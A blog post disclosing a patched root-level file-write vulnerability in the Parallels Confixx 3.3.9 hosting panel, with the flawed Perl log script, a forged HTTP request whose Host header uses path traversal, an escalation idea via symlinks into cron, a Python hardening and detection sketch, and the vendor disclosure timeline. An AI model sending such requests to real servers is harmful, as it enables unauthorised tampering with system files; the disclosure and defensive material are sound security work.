A proof of concept for a vulnerability in Parallels Confixx 3.3.9 (the latest and final version) that allows an attacker to gain full write access (as root) on a UNIX server running said hosting software.
## Preface
**There is a [hotfix available][hotfix] that mitigates the issue.**
Sadly, however, I didn’t get my brownie points 🙁
[hotfix]: http://kb.parallels.com/en/115857
## The vulnerability
[Parallels Confixx][1] is a German-developed web hosting control panel, a product acquired by [SWsoft][2]. It is used to administer UNIX or Windows servers and allows hosting and setting up multiple domains belonging to different users (“web-accounts”). The software is no longer being developed; its replacement is the more widely known [Parallels Plesk Panel][4].
In order to provide users with their own statistics on access to their web sites, a global `CustomLog` is set up in Apache’s configuration. The custom log handler’s target is a pipe to a Perl script (**pipelog.pl**):

```apache
# file is /etc/apache2/confixx_vhost.conf
LogFormat "%V:#:%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-agent}i\"" confixx
CustomLog |/root/confixx/pipelog.pl confixx
```
The pipe is opened by Apache during start-up and remains open the whole time; the script is a process spawned with root privileges. The contents of the file are as follows:
```perl
#!/usr/bin/perl
###### Confixx-Apache-PipeLog
## for logging web accesses per user
########## created on Wed Jan 6 02:30:00 1982 ###
$logDir = "/var/log/apache2/confixx/domains/access";
$stdLog = "/var/log/apache2/confixx/stdlog_access";
while(<>){
    # each record is "%V:#:<log line>"; the first field is whatever %V produced
    ($domain, $log) = split(/:#?:/, $_, 2);
    $domain = lc($domain);
    # $domain is spliced into a path without any validation
    $logfile = "$logDir/$domain";
    $worked = 0;
    if(-l $logfile){
        $target = readlink($logfile);
        unless(-l $target){
            # open() follows the symlink and appends to its target
            if(open(LOG, ">>$logfile")){
                print LOG $log;
                close(LOG);
                $worked=1;
            }
        }
    }
    unless($worked){
        open(LOG, ">>$stdLog") or next;
        print LOG "$domain :: $log";
        close(LOG);
    }
}
```
The culprit is the `%V` formatter of the `LogFormat` directive, which according to the [docs][3] means *“The server name according to the UseCanonicalName setting.”*
This *“server name”*, however, is nothing but whatever the connecting client supplied in the HTTP request’s `Host` header, given a set of preconditions: with `UseCanonicalName Off` (Apache’s default) the client-provided name is used as-is (see [Why is HTTP_HOST evil?](/2011/02/why-http_host-is-evil/)).
[1]: http://www.parallels.com/de/products/confixx/
[2]: http://en.wikipedia.org/wiki/SWsoft
[3]: http://httpd.apache.org/docs/2.2/mod/mod_log_config.html#formats
[4]: http://www.parallels.com/products/plesk/
## Proof of concept
I claim that, given a forged request, one can obtain full write access to a (UNIX) server running Confixx.
The request would have to look like this:

```http
GET / HTTP/1.1
Host: ../../../../../../root/confixx/counter_script.pl
User-Agent: Something
```
Through careless concatenation of the *assumed* domain name with a fixed directory (`$logfile = "$logDir/$domain"` in the script above), the file `$logfile` now points to is:

```text
/var/log/apache2/confixx/domains/access/../../../../../../root/confixx/counter_script.pl
```

which resolves to **/root/confixx/counter_script.pl**, a symlink pointing to another Perl script in the same directory, **confixx_updatescript.pl**. For the exploit to work, the target file *needs* to be a symlink (the `-l $logfile` check) and its target must not itself be a symlink (the `-l $target` check); both conditions hold here. **The intended access log line is then appended to the file the symlink points to**, as root, because `open(LOG, ">>$logfile")` follows the link.
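Because the mistake, a client-controlled string spliced into a filesystem path, is easy to reproduce, here is the logic of the script above modelled in Python. This is an added example and not code from the original post or from Parallels: it shows the record split and the vulnerable `$logfile` construction, a hardened variant that accepts only a plain hostname as the per-domain file name, and a sweep of the `stdlog_access` fallback log for probes that missed their target. The directory names are those of the quoted script; the hostnames, the log line and the stdlog entries are constructed test data.

```python
"""Confixx pipelog.pl modelled in Python: the vulnerable path construction,
a hardened replacement, and a sweep of the fallback log for probes.

Added example for this page, not code from the original post or from
Parallels.  Directory names are those of the quoted script; every host,
request line and log line below is constructed test data.
"""
import posixpath
import re

LOG_DIR = "/var/log/apache2/confixx/domains/access"   # $logDir in pipelog.pl

# A pipelog record is "<%V>:#:<combined log line>"; the script splits on the
# first match of /:#?:/, so a bare "::" is accepted as separator as well.
RECORD_SEP = re.compile(r":#?:")

# Strict RFC 1123 hostname: dot-separated labels of letters, digits and
# hyphens, 253 characters at most.  '/', '..', spaces and NUL never match.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)*"
    r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.?$"
)


def split_record(record):
    """(domain, log) exactly as pipelog.pl computes them: host lower-cased,
    the remainder untouched.  Without a separator the log part is empty."""
    parts = RECORD_SEP.split(record, maxsplit=1)
    return parts[0].lower(), (parts[1] if len(parts) > 1 else "")


def vulnerable_logfile(domain):
    """`$logfile = "$logDir/$domain"` as the kernel resolves it: every '..'
    walks one level out of LOG_DIR, so the client picks the file."""
    return posixpath.normpath(f"{LOG_DIR}/{domain}")


def hardened_logfile(domain, log_dir=LOG_DIR):
    """Per-domain log path, or None when the value is not a plain hostname.
    Symlinks *inside* log_dir stay allowed (Confixx relies on them); what is
    refused is any name that is not a single path component under log_dir."""
    domain = domain.lower()
    if not HOSTNAME_RE.match(domain):
        return None
    path = posixpath.join(log_dir, domain)
    # Belt and braces: after normalisation the parent must still be log_dir.
    if posixpath.dirname(posixpath.normpath(path)) != log_dir:
        return None
    return path


def traversal_attempts(stdlog_lines):
    """Records for hosts without a symlink land in stdlog_access as
    "<domain> :: <log>".  Return every host carrying a path separator or
    '..': a probe for this bug that missed its target looks exactly so."""
    hits = []
    for line in stdlog_lines:
        domain, sep, _log = line.partition(" :: ")
        if sep and ("/" in domain or ".." in domain):
            hits.append(domain)
    return hits


# Constructed sample input: one legitimate record and the PoC host above.
CLF = '203.0.113.7 - - [11/Oct/2012:10:00:00 +0200] "GET / HTTP/1.1" 200 512 "-" "Something"\n'
BENIGN = "www.example.com:#:" + CLF
ATTACK = "../../../../../../root/confixx/counter_script.pl:#:" + CLF

# Constructed stdlog_access content: an unknown host and a probe that missed.
STDLOG = [
    "www.example.com :: " + CLF,
    "../../../../../../home/user/own_link :: " + CLF,
]

if __name__ == "__main__":
    for rec in (BENIGN, ATTACK):
        domain, _ = split_record(rec)
        print(f"{domain!r}\n  vulnerable -> {vulnerable_logfile(domain)}"
              f"\n  hardened   -> {hardened_logfile(domain)}")
    print("probes in stdlog:", traversal_attempts(STDLOG))
```

In the Perl script itself the equivalent guard is one line before the path is built, for instance `next unless $domain =~ /^[a-z0-9](?:[a-z0-9.-]*[a-z0-9])?$/;`; this is an illustration of the check, not the text of Parallels’ hotfix, which this post does not reproduce.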
## The vulnerability’s effects
This post’s headline is “Write anywhere vulnerability” because it would theoretically be possible, given a non-privileged account on the target machine, to hijack the entire box: create a symlink of one’s own (in a directory the account can write to) that points to a file in, say, `/etc/cron.daily`, which we know is executable and most likely a shell script, reach that symlink through the traversal, and append to its target accordingly…
I haven’t explored to what extent this is actually *useful*; still, there is the undeniable possibility of at least “wrecking” a server running Confixx by appending junk to symlink targets in e.g. `/usr/bin/`, thereby breaking vital system executables. Thus this would probably classify as a DoS vulnerability.
Plus, the attacker has two more vectors at their disposal: the client-controlled request headers `User-Agent` and `Referer`, which are part of the log line appended to the target file.
## Updates
The following are conversations with a member of **Parallels, Inc.** support staff who shall be called “Samuel” henceforth for obvious privacy reasons.
### October 11th, 2012
*Reported issue to Confixx Support Team of Parallels Inc.*
**Outbound:**
> Dear Sir or Madam,
>
> I’ve been referred to this address by EMEA Sales Headquarters, Munich to report my issue.
>
> I found a security issue in Parallels Confixx 3.3.9 (Unix) with which one gains full (root) write access to the server’s file system. I understand Confixx has reached its end of lifetime and will not be developed on any further. The issue, however, should be part of a hotfix.
>
> Kindly have the department in charge of these kinds of issues contact me.
>
> Kind regards,
> Oliver Schieche
**Inbound:**
*Note:* “Samuel” steps in to answer my mail. Though his signature shows him to be a “sales person”, he was the only contact I had in dealing with the issue. There was actually a previous mail from “Samuel” asking me to explain the issue in detail; it isn’t quoted here, since it’s irrelevant. In it, though, I gave him the link to this post and the password. This was the reply:
> Hello Oliver,
>
> thank you for forwarding the problem.
> I have forwarded the problem to our developers. Please don’t change the password to your post.
> I will keep you updated.
>
> Mit freundlichen Grüßen / Best Regards,
>
> --
>
> Samuel
> Sales Engineer
> Parallels
### October 26th, 2012
*Received feedback from “Samuel”: they fixed the issue.*
> Hi Oliver,
>
> we solved the issue. Please find attached the new pipelog.pl
>
>
> Mit freundlichen Grüßen / Best Regards,
> --
> Samuel
> Sales Engineer
> Parallels
>
> Knowledge Base: http://kb.parallels.com
*I asked when I could publish this article pending an official statement of Parallels Inc. concerning the issue.*
**Outbound:**
> Hi Samuel,
>
> thanks for the update. When will this fix be deployed? I’d like to
> publish my post, but not without properly linking to a solution…
**Inbound:**
> Hello Oliver,
>
> We are going to publish an article. But when this article will be published I don’t know unfortunately.
>
> Best Regards,
> Samuel
### March 19th, 2013
*Trying to get an update on things*
> Hello Parallels Support Team,
>
> a long time has passed since our last correspondence regarding the security issue, but I haven’t heard from you since. Is there an advisory or any such thing I can update my post with to publish it?
>
> Regards,
> Oliver Schieche
### March 28th, 2013
*Received last mail from “Samuel”: the issue was posted in their KB.*
> Hello Oliver,
>
> We have published it:
>
> http://kb.parallels.com/en/115857
>
> Best Regards,
> Samuel